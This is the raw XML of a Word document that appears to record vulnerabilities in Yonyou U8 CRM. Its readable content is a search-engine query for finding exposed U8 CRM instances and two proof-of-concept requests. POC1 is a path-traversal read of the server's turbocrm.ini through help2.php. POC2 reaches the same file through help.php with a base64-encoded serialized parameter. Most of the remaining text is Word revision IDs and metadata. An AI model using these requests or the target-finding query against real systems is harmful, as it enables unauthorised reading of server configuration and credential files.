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B8BA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5F4F4563">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app="用友-U8CRM" || title="用友U8CRM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3B5E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9F9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887557">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>POC1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45D58BD6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48762CE5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/pub/help2.php?key=/../../tsvr/turbocrm.ini</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7677A722">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2AC7DE9B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>POC2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CB01D9D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E6B3AA7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/pub/help.php?key=YToxOntpOjA7czozMDoiLy4uLy4uLy4uLy4uL3RzdnIvdHVyYm9jcm0uaW5pIjt9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BC84FD7"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 w14:paraId="4877591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MmRmNDMwNTY5OTYyNDM2N2VjMmMzMjg5NmJjMmQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="57FD1524"/>
    <w:rsid w:val="00B4047C"/>
    <w:rsid w:val="0E6B247B"/>
    <w:rsid w:val="0FF7FEA5"/>
    <w:rsid w:val="13DFAD20"/>
    <w:rsid w:val="1785A926"/>
    <w:rsid w:val="17CF6E68"/>
    <w:rsid w:val="17E55D5F"/>
    <w:rsid w:val="1B97CA72"/>
    <w:rsid w:val="1E7A3B29"/>
    <w:rsid w:val="1F5F8E86"/>
    <w:rsid w:val="1F9F2A16"/>
    <w:rsid w:val="1FF3D49F"/>
    <w:rsid w:val="1FFF89E9"/>
    <w:rsid w:val="244A1156"/>
    <w:rsid w:val="299F9458"/>
    <w:rsid w:val="29F99800"/>
    <w:rsid w:val="2A863544"/>
    <w:rsid w:val="2BBE0817"/>
    <w:rsid w:val="2BFF4FB5"/>
    <w:rsid w:val="2BFF5176"/>
    <w:rsid w:val="2DB5FEFB"/>
    <w:rsid w:val="2DD27B69"/>
    <w:rsid w:val="2DD34CCD"/>
    <w:rsid w:val="2DD5B0C0"/>
    <w:rsid w:val="2EFF020B"/>
    <w:rsid w:val="2FBFBFFB"/>
    <w:rsid w:val="2FDF3766"/>
    <w:rsid w:val="2FFF4B20"/>
    <w:rsid w:val="33397BD2"/>
    <w:rsid w:val="37D79716"/>
    <w:rsid w:val="37EE8CD9"/>
    <w:rsid w:val="37FF2A93"/>
    <w:rsid w:val="37FF9796"/>
    <w:rsid w:val="387F2B36"/>
    <w:rsid w:val="3AB73EF0"/>
    <w:rsid w:val="3BDFC0B7"/>
    <w:rsid w:val="3C93886E"/>
    <w:rsid w:val="3CEF9AF8"/>
    <w:rsid w:val="3D79E67D"/>
    <w:rsid w:val="3EB31C8B"/>
    <w:rsid w:val="3EFC37B8"/>
    <w:rsid w:val="3EFFD843"/>
    <w:rsid w:val="3FBFCB8B"/>
    <w:rsid w:val="3FDEA6AA"/>
    <w:rsid w:val="3FEB3B3D"/>
    <w:rsid w:val="3FF80E9F"/>
    <w:rsid w:val="3FFCDE76"/>
    <w:rsid w:val="418F03C1"/>
    <w:rsid w:val="42FD4AE6"/>
    <w:rsid w:val="48D5008D"/>
    <w:rsid w:val="49E73956"/>
    <w:rsid w:val="4F4E1CE2"/>
    <w:rsid w:val="4FDCCC2A"/>
    <w:rsid w:val="4FF7A29A"/>
    <w:rsid w:val="4FFB5482"/>
    <w:rsid w:val="518460C5"/>
    <w:rsid w:val="524E74B2"/>
    <w:rsid w:val="53E3D198"/>
    <w:rsid w:val="54FD31BC"/>
    <w:rsid w:val="55BF7986"/>
    <w:rsid w:val="55EBD72F"/>
    <w:rsid w:val="56E7394D"/>
    <w:rsid w:val="57771623"/>
    <w:rsid w:val="577BEC18"/>
    <w:rsid w:val="57FD1524"/>
    <w:rsid w:val="5AFD7C30"/>
    <w:rsid w:val="5B6E52F5"/>
    <w:rsid w:val="5BCDD2E7"/>
    <w:rsid w:val="5BD77C15"/>
    <w:rsid w:val="5BFD9482"/>
    <w:rsid w:val="5D7B3FBC"/>
    <w:rsid w:val="5DFB9FF8"/>
    <w:rsid w:val="5EEB849B"/>
    <w:rsid w:val="5EFD149D"/>
    <w:rsid w:val="5F7A13AB"/>
    <w:rsid w:val="5F7F0FB8"/>
    <w:rsid w:val="5FBF167B"/>
    <w:rsid w:val="5FED12B8"/>
    <w:rsid w:val="5FF1F784"/>
    <w:rsid w:val="5FF3E307"/>
    <w:rsid w:val="60238493"/>
    <w:rsid w:val="617F880E"/>
    <w:rsid w:val="61853D5A"/>
    <w:rsid w:val="63DBC652"/>
    <w:rsid w:val="65FF423B"/>
    <w:rsid w:val="6690A103"/>
    <w:rsid w:val="67E7CB12"/>
    <w:rsid w:val="67FF23E7"/>
    <w:rsid w:val="67FFF15E"/>
    <w:rsid w:val="684F53CA"/>
    <w:rsid w:val="6A456C85"/>
    <w:rsid w:val="6B54702E"/>
    <w:rsid w:val="6BBB4FAF"/>
    <w:rsid w:val="6BCDD5AF"/>
    <w:rsid w:val="6BDF1674"/>
    <w:rsid w:val="6BF3A92F"/>
    <w:rsid w:val="6D7E2FFF"/>
    <w:rsid w:val="6DB22A8C"/>
    <w:rsid w:val="6EBBFE9E"/>
    <w:rsid w:val="6EF70D5B"/>
    <w:rsid w:val="6EFB71B1"/>
    <w:rsid w:val="6EFE788C"/>
    <w:rsid w:val="6F6F2774"/>
    <w:rsid w:val="6FBD7CF2"/>
    <w:rsid w:val="6FE75C91"/>
    <w:rsid w:val="6FEE5854"/>
    <w:rsid w:val="7020421A"/>
    <w:rsid w:val="70257422"/>
    <w:rsid w:val="70B63205"/>
    <w:rsid w:val="711B4E43"/>
    <w:rsid w:val="72CFED86"/>
    <w:rsid w:val="73A9F55B"/>
    <w:rsid w:val="73C94D1C"/>
    <w:rsid w:val="73CBABE1"/>
    <w:rsid w:val="73DF1153"/>
    <w:rsid w:val="73FD6563"/>
    <w:rsid w:val="75FDE963"/>
    <w:rsid w:val="76BF7AB2"/>
    <w:rsid w:val="76C18528"/>
    <w:rsid w:val="76EB1E07"/>
    <w:rsid w:val="77E42D04"/>
    <w:rsid w:val="77FB1747"/>
    <w:rsid w:val="77FFE35A"/>
    <w:rsid w:val="785F0ADD"/>
    <w:rsid w:val="7956CD3D"/>
    <w:rsid w:val="79FFF76A"/>
    <w:rsid w:val="7A7BBABE"/>
    <w:rsid w:val="7A95D0EB"/>
    <w:rsid w:val="7AD64DD6"/>
    <w:rsid w:val="7AF94817"/>
    <w:rsid w:val="7B3BD7E9"/>
    <w:rsid w:val="7B7A30CF"/>
    <w:rsid w:val="7B7B0B69"/>
    <w:rsid w:val="7B995757"/>
    <w:rsid w:val="7BADE33A"/>
    <w:rsid w:val="7BD7F576"/>
    <w:rsid w:val="7BF7E1F0"/>
    <w:rsid w:val="7BF7ECA9"/>
    <w:rsid w:val="7BFF60DD"/>
    <w:rsid w:val="7CD5C5D6"/>
    <w:rsid w:val="7CF6A534"/>
    <w:rsid w:val="7CF7A1BC"/>
    <w:rsid w:val="7D39CCA9"/>
    <w:rsid w:val="7D7FDF5C"/>
    <w:rsid w:val="7DFFA47E"/>
    <w:rsid w:val="7E6E81D2"/>
    <w:rsid w:val="7E78C45A"/>
    <w:rsid w:val="7E7BCD1C"/>
    <w:rsid w:val="7E7E60FB"/>
    <w:rsid w:val="7E9F6F51"/>
    <w:rsid w:val="7EAE9A02"/>
    <w:rsid w:val="7EBDF6C6"/>
    <w:rsid w:val="7EFC1F47"/>
    <w:rsid w:val="7EFDDE9E"/>
    <w:rsid w:val="7F26BCBA"/>
    <w:rsid w:val="7F376BCC"/>
    <w:rsid w:val="7F3E08FE"/>
    <w:rsid w:val="7F3F55B7"/>
    <w:rsid w:val="7F6F3B96"/>
    <w:rsid w:val="7F765816"/>
    <w:rsid w:val="7FAFBBCC"/>
    <w:rsid w:val="7FB3A4A5"/>
    <w:rsid w:val="7FB7D77D"/>
    <w:rsid w:val="7FBB719F"/>
    <w:rsid w:val="7FBEA1CB"/>
    <w:rsid w:val="7FCE339B"/>
    <w:rsid w:val="7FD73586"/>
    <w:rsid w:val="7FDB36B4"/>
    <w:rsid w:val="7FDB6353"/>
    <w:rsid w:val="7FDF2293"/>
    <w:rsid w:val="7FDF396C"/>
    <w:rsid w:val="7FE69C24"/>
    <w:rsid w:val="7FED6077"/>
    <w:rsid w:val="7FED80C6"/>
    <w:rsid w:val="7FEFB24F"/>
    <w:rsid w:val="7FF2849D"/>
    <w:rsid w:val="7FF52585"/>
    <w:rsid w:val="7FFAE25C"/>
    <w:rsid w:val="7FFDE5C5"/>
    <w:rsid w:val="7FFE79BD"/>
    <w:rsid w:val="7FFF692E"/>
    <w:rsid w:val="7FFFCBF4"/>
    <w:rsid w:val="7FFFE085"/>
    <w:rsid w:val="8AB78574"/>
    <w:rsid w:val="903BCFC1"/>
    <w:rsid w:val="93F99F0F"/>
    <w:rsid w:val="967B4632"/>
    <w:rsid w:val="97AE0B38"/>
    <w:rsid w:val="99FFFF3F"/>
    <w:rsid w:val="9AFD16AC"/>
    <w:rsid w:val="9BCF7D2B"/>
    <w:rsid w:val="9CFEACB1"/>
    <w:rsid w:val="9F7CD18D"/>
    <w:rsid w:val="9F9720AE"/>
    <w:rsid w:val="9FAF2B7F"/>
    <w:rsid w:val="9FDAB30B"/>
    <w:rsid w:val="9FFDAEBF"/>
    <w:rsid w:val="9FFF3431"/>
    <w:rsid w:val="A1FD5A70"/>
    <w:rsid w:val="A27E69B0"/>
    <w:rsid w:val="A3D3B5AD"/>
    <w:rsid w:val="A6FDCE76"/>
    <w:rsid w:val="A8FB678E"/>
    <w:rsid w:val="AD5B8CAC"/>
    <w:rsid w:val="AEFED516"/>
    <w:rsid w:val="AF47AD03"/>
    <w:rsid w:val="AFB6F41D"/>
    <w:rsid w:val="B0974690"/>
    <w:rsid w:val="B47F41C3"/>
    <w:rsid w:val="B53FB2C1"/>
    <w:rsid w:val="B73E3741"/>
    <w:rsid w:val="B7FF178E"/>
    <w:rsid w:val="B96C5A42"/>
    <w:rsid w:val="BB6E64CC"/>
    <w:rsid w:val="BDEE8467"/>
    <w:rsid w:val="BDFF1BC3"/>
    <w:rsid w:val="BDFF3D9F"/>
    <w:rsid w:val="BE77A9F7"/>
    <w:rsid w:val="BF5D1E32"/>
    <w:rsid w:val="BFB37021"/>
    <w:rsid w:val="BFF7428B"/>
    <w:rsid w:val="BFFEEB34"/>
    <w:rsid w:val="BFFFD0DE"/>
    <w:rsid w:val="BFFFFF57"/>
    <w:rsid w:val="C35F894E"/>
    <w:rsid w:val="C3FE21AB"/>
    <w:rsid w:val="C725C9FC"/>
    <w:rsid w:val="CAF582E6"/>
    <w:rsid w:val="CBBE2114"/>
    <w:rsid w:val="CBFF7C50"/>
    <w:rsid w:val="CD6FAFC1"/>
    <w:rsid w:val="CFDEC857"/>
    <w:rsid w:val="CFEB1D61"/>
    <w:rsid w:val="CFFA9BEF"/>
    <w:rsid w:val="CFFF237C"/>
    <w:rsid w:val="D47BD7E0"/>
    <w:rsid w:val="D7344563"/>
    <w:rsid w:val="D7B732F6"/>
    <w:rsid w:val="D8BF77E5"/>
    <w:rsid w:val="D9AD4A21"/>
    <w:rsid w:val="D9BBCE23"/>
    <w:rsid w:val="DBA4F869"/>
    <w:rsid w:val="DD7D3824"/>
    <w:rsid w:val="DDDFE8FB"/>
    <w:rsid w:val="DE7FDD73"/>
    <w:rsid w:val="DEF9DEED"/>
    <w:rsid w:val="DFCF9D82"/>
    <w:rsid w:val="DFF54C4B"/>
    <w:rsid w:val="DFF63828"/>
    <w:rsid w:val="DFFF08E0"/>
    <w:rsid w:val="DFFFC62C"/>
    <w:rsid w:val="E2DF4477"/>
    <w:rsid w:val="E59FF217"/>
    <w:rsid w:val="E77B0D1F"/>
    <w:rsid w:val="E79B4105"/>
    <w:rsid w:val="E7FA619A"/>
    <w:rsid w:val="E9ED6298"/>
    <w:rsid w:val="EB3FABDA"/>
    <w:rsid w:val="EB9F36C9"/>
    <w:rsid w:val="EBF91784"/>
    <w:rsid w:val="ECB7AB14"/>
    <w:rsid w:val="ECFE5741"/>
    <w:rsid w:val="EDBFE5F3"/>
    <w:rsid w:val="EE3F6450"/>
    <w:rsid w:val="EF7D3A8B"/>
    <w:rsid w:val="EFF9367F"/>
    <w:rsid w:val="EFFAC8C3"/>
    <w:rsid w:val="EFFF8005"/>
    <w:rsid w:val="EFFFA52C"/>
    <w:rsid w:val="EFFFAB75"/>
    <w:rsid w:val="F0FAAA88"/>
    <w:rsid w:val="F1FDE6F5"/>
    <w:rsid w:val="F1FF2A92"/>
    <w:rsid w:val="F27D5C03"/>
    <w:rsid w:val="F27FCA1F"/>
    <w:rsid w:val="F297FCDB"/>
    <w:rsid w:val="F3BF0145"/>
    <w:rsid w:val="F3FBB573"/>
    <w:rsid w:val="F4B7A44D"/>
    <w:rsid w:val="F57112A3"/>
    <w:rsid w:val="F5AB2C7D"/>
    <w:rsid w:val="F5B36BE9"/>
    <w:rsid w:val="F5BF77B4"/>
    <w:rsid w:val="F5F72DF8"/>
    <w:rsid w:val="F6273DA8"/>
    <w:rsid w:val="F6690D7E"/>
    <w:rsid w:val="F6FBF995"/>
    <w:rsid w:val="F76B3DD1"/>
    <w:rsid w:val="F7778859"/>
    <w:rsid w:val="F77FFC25"/>
    <w:rsid w:val="F79E8BA0"/>
    <w:rsid w:val="F7D95AD9"/>
    <w:rsid w:val="F7DB388E"/>
    <w:rsid w:val="F7E28B87"/>
    <w:rsid w:val="F7F5C8C0"/>
    <w:rsid w:val="F7FF6A77"/>
    <w:rsid w:val="F8BF8985"/>
    <w:rsid w:val="F97FB8ED"/>
    <w:rsid w:val="F9962060"/>
    <w:rsid w:val="F9CB2FFD"/>
    <w:rsid w:val="F9E62CBF"/>
    <w:rsid w:val="F9F3E506"/>
    <w:rsid w:val="F9F7F0EB"/>
    <w:rsid w:val="F9FF8D69"/>
    <w:rsid w:val="FA324E87"/>
    <w:rsid w:val="FAFBD3D7"/>
    <w:rsid w:val="FAFDEFD2"/>
    <w:rsid w:val="FAFEF8A2"/>
    <w:rsid w:val="FB5F0364"/>
    <w:rsid w:val="FBA30457"/>
    <w:rsid w:val="FBCB6F0D"/>
    <w:rsid w:val="FBEC3635"/>
    <w:rsid w:val="FBFB645F"/>
    <w:rsid w:val="FC7F72EA"/>
    <w:rsid w:val="FCF06FFB"/>
    <w:rsid w:val="FD1EE484"/>
    <w:rsid w:val="FD4FF5F1"/>
    <w:rsid w:val="FD6AEB77"/>
    <w:rsid w:val="FD7F4FD3"/>
    <w:rsid w:val="FD7F867D"/>
    <w:rsid w:val="FDADAFFC"/>
    <w:rsid w:val="FDB75070"/>
    <w:rsid w:val="FDBE7BD1"/>
    <w:rsid w:val="FDBFAA8F"/>
    <w:rsid w:val="FDBFD45E"/>
    <w:rsid w:val="FDEE5A13"/>
    <w:rsid w:val="FDF1F0A9"/>
    <w:rsid w:val="FDFBD708"/>
    <w:rsid w:val="FDFFBEF1"/>
    <w:rsid w:val="FE7B1328"/>
    <w:rsid w:val="FE9BFA22"/>
    <w:rsid w:val="FEDE071F"/>
    <w:rsid w:val="FEEBBCF6"/>
    <w:rsid w:val="FEF27B8B"/>
    <w:rsid w:val="FEFA3455"/>
    <w:rsid w:val="FEFC3A5C"/>
    <w:rsid w:val="FEFC4869"/>
    <w:rsid w:val="FF4FFC4C"/>
    <w:rsid w:val="FF5DA5AC"/>
    <w:rsid w:val="FF679AA1"/>
    <w:rsid w:val="FF6D89C7"/>
    <w:rsid w:val="FF7BC27C"/>
    <w:rsid w:val="FF7CA208"/>
    <w:rsid w:val="FF7FA203"/>
    <w:rsid w:val="FFBC1160"/>
    <w:rsid w:val="FFBCCD69"/>
    <w:rsid w:val="FFBDD75C"/>
    <w:rsid w:val="FFBF78FF"/>
    <w:rsid w:val="FFBF7C90"/>
    <w:rsid w:val="FFDEFE55"/>
    <w:rsid w:val="FFDF9E60"/>
    <w:rsid w:val="FFDFA1FC"/>
    <w:rsid w:val="FFDFC11F"/>
    <w:rsid w:val="FFE4EA8F"/>
    <w:rsid w:val="FFEF119A"/>
    <w:rsid w:val="FFF11AE6"/>
    <w:rsid w:val="FFF3FA3D"/>
    <w:rsid w:val="FFF7BF3C"/>
    <w:rsid w:val="FFF9B26C"/>
    <w:rsid w:val="FFFB349C"/>
    <w:rsid w:val="FFFB3EFB"/>
    <w:rsid w:val="FFFC469D"/>
    <w:rsid w:val="FFFC8503"/>
    <w:rsid w:val="FFFD6A02"/>
    <w:rsid w:val="FFFDF767"/>
    <w:rsid w:val="FFFE2F17"/>
    <w:rsid w:val="FFFF0078"/>
    <w:rsid w:val="FFFFE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335</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>16</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>357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2024-03-07T08:56:00Z</dcterms:created>
  <dc:creator>路边菜贩子</dc:creator>
  <cp:lastModifiedBy>W.CONG</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-19T09:17:53Z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239BAF64848D2AE6A9B1B1659314282A_41</vt:lpwstr>
  </property>
</Properties>
</file>